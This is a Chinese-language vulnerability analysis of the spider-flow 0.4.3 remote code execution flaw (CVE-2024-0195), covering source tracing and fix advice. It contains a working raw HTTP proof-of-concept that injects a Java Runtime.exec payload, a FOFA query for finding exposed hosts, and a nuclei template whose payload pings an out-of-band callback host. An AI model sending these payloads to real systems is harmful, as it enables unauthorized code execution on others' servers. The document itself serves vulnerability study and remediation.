Spider-flow RCE漏洞分析(CVE-2024-0195)

0x01 产品简介

spider-flow是一个高度灵活可配置的爬虫平台,平台以流程图的方式定义爬虫。

下载链接:https://github.com/ssssssss-team/spider-flow

0x02 漏洞描述

spider-flow 0.4.3版本的src/main/java/org/spiderflow/controller/FunctionController.java文件的FunctionService.saveFunction函数中发现了一个被归类为关键的漏洞。该漏洞可导致代码注入,并允许远程发起攻击。

并再每一次重启后都会执行

0x03 影响版本

spider-flow 0.4.3

0x04 搜索语法

​ fofa

1
app="spiderflow"

0x05 漏洞复现与分析

系统界面

![image-20240823214038307](spider-flow RCE漏洞分析.assets/image-20240823214038307.png)

漏洞poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /function/save HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Origin: http://10.151.220.236:8088
Connection: close
Referer: http://10.151.220.236:8088/function-edit.html
Cookie: JSESSIONID=43BED3B6A9E85CBF4C4754F334C36953; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706163744; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706167658

id=&name=aaa&parameter=aaa&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

解析:

1
java.type('java.lang.Runtime').getRuntime().exec('calc');

java.type('java.lang.Runtime'):

  • 这是在使用一种动态调用方式来获取Runtime类。这个类提供了与Java应用程序运行时环境交互的方法。

getRuntime():

  • 这是Runtime类中的静态方法,用于获取当前Java应用程序的Runtime对象。

exec('calc'):

  • exec()方法用于在当前环境中执行指定的系统命令。在这个例子中,命令是calc,它会在Windows系统上打开计算器应用程序。

![image-20240823214109862](spider-flow RCE漏洞分析.assets/image-20240823214109862.png)

函数调用链

public String save(Function function)

![image-20240824160305280](spider-flow RCE漏洞分析.assets/image-20240824160305280.png)

->public String saveFunction(Function entity)

![image-20240824160245929](spider-flow RCE漏洞分析.assets/image-20240824160245929.png)

->public static void validScript(String functionName,String parameters,String script) throws Exception

![image-20240824160226239](spider-flow RCE漏洞分析.assets/image-20240824160226239.png)

->private static String concatScript(String functionName,String parameters,String script)

变量的拼接未经过任何过滤

![image-20240824145657685](spider-flow RCE漏洞分析.assets/image-20240824145657685.png)

nuclei的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
id: CVE-2024-0195

info:
  name: SpiderFlow Crawler Platform - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.
  reference:
    - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md
    - https://vuldb.com/?id.249510
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0195
    - https://vuldb.com/?ctiid.249510
    - https://github.com/Tropinene/Yscanner
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0195
    cwe-id: CWE-94
    epss-score: 0.89846
    epss-percentile: 0.98769
    cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ssssssss
    product: "spider-flow"
    fofa-query:
      - "app=\"SpiderFlow\""
      - app="spiderflow"
  tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'SPIDER_FLOW_VERSION'

  - raw:
      - |
        POST /function/save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a004630440220441ad46885b455c236ce16bd52020d0f8f142b8b3c28f5eb9f4f2a683821342702207de3c7d603b1b1da12b5752330c2112c6411c15c8eaed0f87150be2c41d2959c:922c64590222798bb761d5b6d8e72950

![image-20240823214528864](spider-flow RCE漏洞分析.assets/image-20240823214528864.png)

0x06 修复建议

1.在拼接的时候对script进行过滤处理

2.打补丁

0x07 学习知识

  1. 代码审计的基本思路:

    1. 寻找危险函数
    2. 函数参数
    3. 调用危险函数的函数
    4. 构造利用

  2. 用Google的devtool-request(请求的页面的名字)-playoad-可以获取表单元素

  3. !爬虫的编写